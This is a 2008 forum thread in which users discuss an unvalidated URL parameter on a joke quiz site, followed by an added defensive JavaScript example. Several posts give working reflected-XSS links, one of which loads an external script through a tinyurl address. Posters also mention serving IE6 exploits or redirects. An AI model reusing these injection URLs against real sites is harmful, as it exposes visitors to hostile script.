Computer Science Canada How much are you worth? |
Author: | Aziz [ Wed Jul 30, 2008 11:59 am ] |
Post subject: | How much are you worth? |
I am about $260k. Check it out: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=263090 It's been the hit on IRC lately... |
Author: | Dan [ Wed Jul 30, 2008 12:01 pm ] | ||
Post subject: | RE:How much are you worth? | ||
I am worth: http://www.howmuchisyoursoulworth.com/results.html?radioq0=on&radioq1=on&radioq2=on&radioq3=on&radioq4=on&radioq5=on&radioq6=on&radioq7=on&radioq8=on&radioq9=on&radioq10=on&radioq11=on&radioq12=on&radioq13=on&radioq14=on&earned_points=%3Cscript%20src=%22http://tinyurl.com/5a785n%22%3E
Author: | DemonWasp [ Wed Jul 30, 2008 1:33 pm ] |
Post subject: | RE:How much are you worth? |
@Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar. I'm apparently worth squat: http://www.howmuchisyoursoulworth.com/results.html?earned_points=71605 (You can rip out the &radiog##=on nonsense and it doesn't have any effect) |
Author: | Tony [ Wed Jul 30, 2008 3:03 pm ] |
Post subject: | RE:How much are you worth? |
Page source tells me the max I can be worth is Quote: <input id="max_points" value="570000" type="hidden" /> |
Author: | DemonWasp [ Wed Jul 30, 2008 3:20 pm ] |
Post subject: | RE:How much are you worth? |
That only applies as long as you don't have Firebug, though, Tony...you can modify the value of hidden inputs (or show them, etc) with the flick of a button. I sense someone about to post a screen cap of them being worth a million soul bucks. |
Author: | Aziz [ Wed Jul 30, 2008 3:27 pm ] |
Post subject: | RE:How much are you worth? |
That input has nothing to do with it, though: http://www.howmuchisyoursoulworth.com/results.html?earned_points=999999999999999999 |
Author: | Tony [ Wed Jul 30, 2008 3:29 pm ] |
Post subject: | Re: How much are you worth? |
Just a million? http://www.howmuchisyoursoulworth.com/results.html?earned_points=%3Cblink%3EGoogol%3C/blink%3E Don't even need Firebug to inject arbitrary HTML into the page. |
Author: | DemonWasp [ Wed Jul 30, 2008 3:36 pm ] |
Post subject: | RE:How much are you worth? |
Ah, my bad. I thought the max-value hidden input was on the final page, but clearly not. It clearly doesn't even make an attempt to make sure you entered something valid - strings instead of ints? Come on! It's great when pages have no validation. |
Author: | Tony [ Wed Jul 30, 2008 5:16 pm ] | ||
Post subject: | RE:How much are you worth? | ||
Not just strings, but full out HTML. The "number" is rendered by something along the lines of
Meaning one could inject their own javascript into the page and essentially make that page do whatever they wanted. Which is exactly what Dan has done. |
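Added example (not part of any post above and not the site's own code): one way a results page could handle earned_points so that neither markup nor out-of-range numbers reach the page. It assumes the score is a whole number capped at the max_points value Tony quoted; the function names are hypothetical.

```javascript
// Added example, not the site's code. MAX_POINTS mirrors the hidden
// max_points value quoted in the thread; enforcing it is an assumption.
const MAX_POINTS = 570000;

// Accept only a plain decimal integer within [0, MAX_POINTS].
// Returns the number, or null for anything else (markup, huge values, blanks).
function parseEarnedPoints(resultsUrl) {
  const raw = new URL(resultsUrl).searchParams.get("earned_points");
  if (raw === null || !/^[0-9]{1,6}$/.test(raw)) return null;
  const points = Number(raw);
  return points <= MAX_POINTS ? points : null;
}

// Escape the five HTML-significant characters for text/attribute context.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Build the result fragment. The value is validated first and still escaped
// on output, so a later change to the validator cannot reopen the injection.
// In a browser, assigning the number to element.textContent does the same job.
function renderWorth(resultsUrl) {
  const points = parseEarnedPoints(resultsUrl);
  if (points === null) return "<p>Invalid score.</p>";
  return "<p>You are worth $" + escapeHtml(points) + "</p>";
}

// Constructed sample inputs modelled on the links posted in the thread.
const BASE = "http://www.howmuchisyoursoulworth.com/results.html?earned_points=";
const samples = ["71605", "263090", "999999999999999999", "%3Cblink%3EGoogol%3C/blink%3E"];
for (const s of samples) console.log(s, "->", renderWorth(BASE + s));
```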
Author: | LaZ3R [ Wed Jul 30, 2008 6:26 pm ] |
Post subject: | RE:How much are you worth? |
edit: Whoops... posted really long link and ruined the page horizontally ... my bad |
Author: | Dan [ Wed Jul 30, 2008 9:11 pm ] |
Post subject: | Re: RE:How much are you worth? |
DemonWasp @ 30th July 2008, 1:33 pm wrote: @Dan: Well done, well done. To be honest though, it's not like it's a serious site, so at least this isn't showing up on Paypal or similar.
Yes and no, although this page itself does not have any valuable cookies to steal, I could still inject an exploit for old versions of IE and take out a few IE 6 users or just redirect to a shock site and piss people off |